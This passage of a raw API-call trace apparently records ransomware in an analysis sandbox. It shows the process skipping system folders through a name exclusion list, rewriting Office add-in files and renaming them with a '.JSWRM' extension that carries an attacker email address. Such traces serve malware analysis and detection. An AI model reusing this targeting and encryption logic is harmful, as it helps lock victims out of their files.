lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pl\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pl\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.830] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4550) returned 1 [0126.830] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c0) returned 0x279338 [0126.830] ReadFile (in: hFile=0x338, lpBuffer=0x279338, nNumberOfBytesToRead=0x11c0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesRead=0x345e1cc*=0x11c0, lpOverlapped=0x0) returned 1 [0126.833] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.833] WriteFile (in: hFile=0x338, lpBuffer=0x279338*, nNumberOfBytesToWrite=0x11c0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesWritten=0x345e1c8*=0x11c0, lpOverlapped=0x0) returned 1 [0126.833] CloseHandle (hObject=0x338) returned 1 [0126.833] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pl\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pl\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\pl\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\pl\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.834] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefee59ce, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xefee59ce, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0126.834] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0126.834] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0126.834] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0126.834] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0126.834] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0126.834] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0126.834] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.834] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.834] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0126.834] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0126.834] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.835] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1b5bbeb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1b5bbeb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1b81e2e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x39080, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0126.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d920, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d578, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.835] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2fed144, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2fed144, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x303975a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MI038C~1.DLL")) returned 1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0126.835] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0126.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dba8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.836] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4646280, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4646280, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1ffa98, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0126.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d920, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20dba8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.836] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa911c96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa911c96, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa937f07, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Layout.resources.dll", cAlternateFileName="MI8E88~1.DLL")) returned 1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2=".") returned 1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="..") returned 1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="...") returned 1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="windows") returned -1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="recovery") returned -1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="perflogs") returned -1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="documents and settings") returned 1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="system volume information") returned -1 [0126.836] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Layout.resources.dll", lpString2="msocache") returned -1 [0126.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Layout.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Layout.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.837] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1d4bb8b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1d4bb8b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1d71cd8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1d050, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.837] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2=".") returned 1 [0126.837] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="..") returned 1 [0126.837] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="...") returned 1 [0126.837] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="windows") returned -1 [0126.837] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="recovery") returned -1 [0126.837] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="perflogs") returned -1 [0126.837] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="documents and settings") returned 1 [0126.837] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.837] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="system volume information") returned -1 [0126.837] lstrcmpiW (lpString1="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpString2="msocache") returned -1 [0126.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20dde8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0126.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", cchWideChar=55, lpMultiByteStr=0x20d578, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.XLHost.Modeler.resources.dll", lpUsedDefaultChar=0x0) returned 55 [0126.837] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c63313, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4c63313, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4c63313, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.DataWarehouse.Interfaces.resources.dll", cAlternateFileName="MIE9BA~1.DLL")) returned 1 [0126.837] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2=".") returned 1 [0126.837] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="..") returned 1 [0126.837] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="...") returned 1 [0126.837] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="windows") returned -1 [0126.837] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="recovery") returned -1 [0126.837] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="perflogs") returned -1 [0126.837] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="documents and settings") returned 1 [0126.837] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.837] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="system volume information") returned -1 [0126.837] lstrcmpiW (lpString1="Microsoft.DataWarehouse.Interfaces.resources.dll", lpString2="msocache") returned -1 [0126.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0126.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.Interfaces.resources.dll", cchWideChar=48, lpMultiByteStr=0x20d578, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.Interfaces.resources.dll", lpUsedDefaultChar=0x0) returned 48 [0126.838] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6a56cbe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a56cbe, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a56cbe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c050, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.DataWarehouse.resources.dll", cAlternateFileName="MI9A58~1.DLL")) returned 1 [0126.838] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2=".") returned 1 [0126.838] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="..") returned 1 [0126.838] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="...") returned 1 [0126.838] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="windows") returned -1 [0126.838] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="recovery") returned -1 [0126.838] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="perflogs") returned -1 [0126.838] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="documents and settings") returned 1 [0126.838] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.838] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="system volume information") returned -1 [0126.838] lstrcmpiW (lpString1="Microsoft.DataWarehouse.resources.dll", lpString2="msocache") returned -1 [0126.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0126.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.DataWarehouse.resources.dll", lpUsedDefaultChar=0x0) returned 37 [0126.838] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.DataWarehouse.resources.dll", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, 